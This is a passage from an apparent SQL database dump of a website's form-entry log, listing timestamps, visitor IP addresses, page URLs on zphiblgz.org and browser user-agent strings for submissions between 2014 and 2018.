6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(62,2,NULL,'2014-03-08 01:02:53',0,0,'108.34.44.89','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(63,2,NULL,'2014-03-08 02:33:43',0,0,'71.163.119.74','http://zphiblgz.org/PRETTY-POLISHED-AFFAIR/','Mozilla/5.0 (Linux; Android 4.1.2; LG-LS720 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(64,2,NULL,'2014-03-08 03:20:55',0,0,'72.81.139.37','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (iPad; CPU OS 7_0_6 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B651 Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(65,2,NULL,'2014-03-08 07:33:12',0,0,'108.31.18.124','http://zphiblgz.org/pretty-polished-affair/','Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; DROID BIONIC Build/9.8.2O-72_VZW-22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(66,2,NULL,'2014-03-08 14:46:29',0,1,'72.66.103.148','http://zphiblgz.org/category/events/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(67,2,NULL,'2014-03-08 15:04:57',0,1,'74.107.123.236','http://zphiblgz.org/category/events/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(68,1,NULL,'2014-03-18 05:49:02',0,0,'24.126.49.244','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(69,1,NULL,'2014-04-05 20:51:14',0,0,'131.118.85.21','http://zphiblgz.org/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(70,1,NULL,'2014-04-08 00:22:04',0,0,'24.126.121.40','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(71,1,NULL,'2014-05-13 00:40:44',0,0,'96.244.133.50','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(72,1,NULL,'2014-06-08 19:10:06',0,0,'71.246.248.29','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(73,1,NULL,'2014-06-27 18:24:30',0,0,'162.244.13.18','http://zphiblgz.org/membership/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(74,1,NULL,'2014-08-27 17:53:13',0,0,'198.179.4.254','http://zphiblgz.org/membership/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(75,1,NULL,'2014-09-11 16:51:56',0,0,'37.57.231.226','http://zphiblgz.org/membership/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(76,1,NULL,'2014-09-28 22:54:47',0,0,'71.179.91.221','http://zphiblgz.org/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MAGWJS)','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(77,1,NULL,'2014-10-14 16:44:26',0,0,'64.124.9.130','http://zphiblgz.org/contact/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(78,1,NULL,'2014-10-23 14:31:24',0,0,'159.142.117.174','http://zphiblgz.org/membership/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(79,1,NULL,'2014-10-27 15:10:59',0,0,'216.99.184.50','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(80,1,NULL,'2014-10-27 15:14:40',0,0,'216.99.184.50','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(81,1,NULL,'2014-10-27 15:22:24',0,0,'216.99.184.50','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(82,1,NULL,'2014-10-27 16:01:26',0,0,'216.99.184.50','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,2,NULL,'active',NULL),(83,1,NULL,'2014-10-29 15:43:00',0,0,'138.162.0.43','http://zphiblgz.org/membership/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(84,2,NULL,'2015-02-04 17:10:24',0,1,'24.104.140.60','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B466 Safari/600.1.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(85,1,NULL,'2015-02-07 05:36:59',0,0,'76.100.115.177','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(86,1,NULL,'2015-02-23 19:01:41',0,0,'206.205.147.1','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(87,1,NULL,'2015-02-24 09:27:35',0,0,'73.212.3.51','http://zphiblgz.org/contact/','Mozilla/5.0 (iPad; CPU OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B466 [FBAN/FBIOS;FBAV/24.0.0.12.7;FBBV/6890242;FBDV/iPad4,1;FBMD/iPad;FBSN/iPhone OS;FBSV/8.1.3;FBSS/2; FBCR/;FBID/tablet;FBLC/en_US;FBOP/1]','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(88,1,NULL,'2015-02-24 09:40:30',0,0,'73.212.3.51','http://zphiblgz.org/membership/','Mozilla/5.0 (iPad; CPU OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B466 [FBAN/FBIOS;FBAV/24.0.0.12.7;FBBV/6890242;FBDV/iPad4,1;FBMD/iPad;FBSN/iPhone OS;FBSV/8.1.3;FBSS/2; FBCR/;FBID/tablet;FBLC/en_US;FBOP/1]','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(89,2,NULL,'2015-02-27 19:16:59',0,0,'24.104.140.61','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(90,2,NULL,'2015-02-27 19:17:52',0,0,'24.104.140.61','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(91,2,NULL,'2015-03-02 23:47:17',0,0,'69.143.141.32','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_6 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B651 Safari/9537.53','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(92,2,NULL,'2015-03-03 00:23:22',0,0,'74.103.28.28','http://zphiblgz.org/category/events/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(93,2,NULL,'2015-03-03 15:00:48',0,0,'24.104.140.61','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(94,2,NULL,'2015-03-03 20:50:22',0,0,'73.132.194.31','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(95,2,NULL,'2015-03-04 14:37:14',0,0,'24.104.140.61','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(96,1,NULL,'2015-03-05 15:40:47',0,0,'72.71.145.209','http://zphiblgz.org/membership/','Mozilla/5.0 (iPad; CPU OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B466 Safari/600.1.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(97,1,NULL,'2015-03-09 02:39:12',0,0,'24.49.46.66','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(98,2,NULL,'2015-03-13 02:27:28',0,0,'70.208.152.199','http://zphiblgz.org/pretty-polished-affair-2015/','Mozilla/5.0 (Linux; Android 4.4.4; SM-N910V Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(99,1,NULL,'2015-04-09 15:31:13',0,0,'71.121.189.210','http://zphiblgz.org/contact/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; InfoPath.3)','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(100,1,NULL,'2015-05-05 10:25:48',0,0,'166.137.244.118','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG-SM-N910A Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(101,1,NULL,'2015-05-12 17:31:48',0,0,'140.147.236.194','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(102,1,NULL,'2015-05-12 18:01:35',0,0,'140.147.236.194','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(103,1,NULL,'2015-05-18 15:15:55',0,0,'159.142.159.180','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(104,1,NULL,'2015-08-12 11:52:55',0,0,'192.104.54.179','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(105,1,NULL,'2015-08-24 17:13:36',0,0,'74.11.223.130','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(106,1,NULL,'2015-09-06 02:20:52',0,0,'72.71.128.56','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MALNJS; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(107,1,NULL,'2015-09-10 17:46:37',0,0,'65.207.116.226','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(108,1,NULL,'2015-09-11 22:19:43',0,0,'68.134.30.209','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(109,1,NULL,'2015-09-14 20:42:29',0,0,'73.128.239.83','http://zphiblgz.org/membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(110,1,NULL,'2015-10-03 22:37:20',0,0,'71.121.187.46','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(111,1,NULL,'2015-10-04 02:55:10',0,0,'73.213.236.114','http://zphiblgz.org/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(112,1,NULL,'2015-10-11 14:43:43',0,0,'64.134.70.9','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(113,1,NULL,'2015-10-19 20:50:45',0,0,'158.103.0.1','http://zphiblgz.org/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(114,1,NULL,'2015-12-02 12:53:34',0,0,'70.208.134.145','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 4.4.4; XT1080 Build/SU6-7.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(115,1,NULL,'2015-12-11 01:14:55',0,0,'24.31.213.114','http://zphiblgz.org/membership/','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(116,1,NULL,'2016-01-05 00:41:27',0,0,'100.15.158.58','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 4.4.4; SAMSUNG-SM-G530AZ Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(117,1,NULL,'2016-01-14 17:08:38',0,0,'167.102.191.10','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(118,1,NULL,'2016-01-16 15:11:14',0,0,'172.58.216.252','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 5.1.1; LGMS345 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(119,1,NULL,'2016-01-31 08:26:16',0,0,'71.244.196.206','http://zphiblgz.org/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(120,1,NULL,'2016-02-02 19:08:16',0,0,'73.134.151.109','http://zphiblgz.org/membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(121,1,NULL,'2016-02-02 19:09:32',0,0,'73.134.151.109','http://zphiblgz.org/membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(122,1,NULL,'2016-03-06 14:27:41',0,0,'50.153.249.64','http://zphiblgz.org/membership/','Mozilla/5.0 (Linux; Android 4.4.4; SM-G900V Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(123,1,NULL,'2016-03-15 14:15:13',0,0,'24.104.140.51','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(124,1,NULL,'2016-03-17 11:57:30',0,0,'73.212.16.26','http://zphiblgz.org/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(125,1,NULL,'2016-04-14 00:39:29',0,0,'100.36.65.2','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(126,1,NULL,'2016-05-01 11:39:05',0,0,'73.128.239.83','http://zphiblgz.org/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(127,1,NULL,'2016-05-16 17:27:32',0,0,'98.231.129.42','http://zphiblgz.org/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(128,1,NULL,'2016-08-28 02:44:22',0,0,'73.133.157.74','http://zphiblgz.org/contact/','Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SGH-I467 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(129,1,NULL,'2016-09-30 10:21:54',0,0,'73.128.239.83','http://zphiblgz.org/membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(130,1,NULL,'2016-10-05 18:51:27',0,0,'150.148.14.3','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(131,1,NULL,'2016-10-19 10:48:21',0,0,'100.15.146.91','http://zphiblgz.org/contact/','Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG-SM-G930A Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Mobile Safari/537.36 Instagram 9.5.5 Android (23/6.0.1; 640dpi; 1440x2560; samsung; SAMSUNG-SM-G930A; heroql','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(132,1,NULL,'2016-11-06 15:46:20',0,0,'173.73.227.90','http://zphiblgz.org/contact/','Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG-SM-G930A Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.68 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(133,1,NULL,'2016-11-12 04:00:48',0,0,'166.137.244.109','http://zphiblgz.org/contact/','Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G870A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(134,1,NULL,'2016-11-16 00:58:05',0,0,'73.86.46.127','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(135,1,NULL,'2016-11-16 21:25:59',0,1,'8.21.241.69','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(136,1,NULL,'2017-01-06 20:02:45',0,1,'167.102.228.16','http://zphiblgz.org/membership/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(137,4,NULL,'2017-01-16 09:12:29',0,0,'50.164.59.70','http://zphiblgz.org/zen/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(138,6,NULL,'2017-08-11 12:53:45',0,0,'153.31.113.21','http://zphiblgz.org/scholarship-testing/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(139,7,NULL,'2017-09-13 12:29:01',0,0,'69.143.34.19','http://zphiblgz.org/service/youth/','Mozilla/5.0 (X11; CrOS x86_64 9592.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.112 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(140,8,NULL,'2018-02-05 22:38:52',0,0,'98.231.130.173','http://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(141,8,NULL,'2018-02-14 16:49:04',0,0,'50.225.39.92','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(142,8,NULL,'2018-02-15 17:32:40',0,0,'50.225.39.80','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(143,8,NULL,'2018-02-18 15:41:47',0,0,'73.134.159.197','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(144,7,NULL,'2018-02-26 18:38:37',0,0,'167.102.245.34','https://zphiblgz.org/service/youth/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(145,8,NULL,'2018-02-27 01:55:41',0,0,'68.134.25.149','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(146,8,NULL,'2018-02-28 20:20:19',0,0,'50.225.39.74','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(147,8,NULL,'2018-03-06 12:40:50',0,0,'50.225.39.73','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(148,8,NULL,'2018-03-06 13:00:44',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(149,8,NULL,'2018-03-06 13:30:18',0,0,'50.225.39.74','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(150,8,NULL,'2018-03-06 14:01:50',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 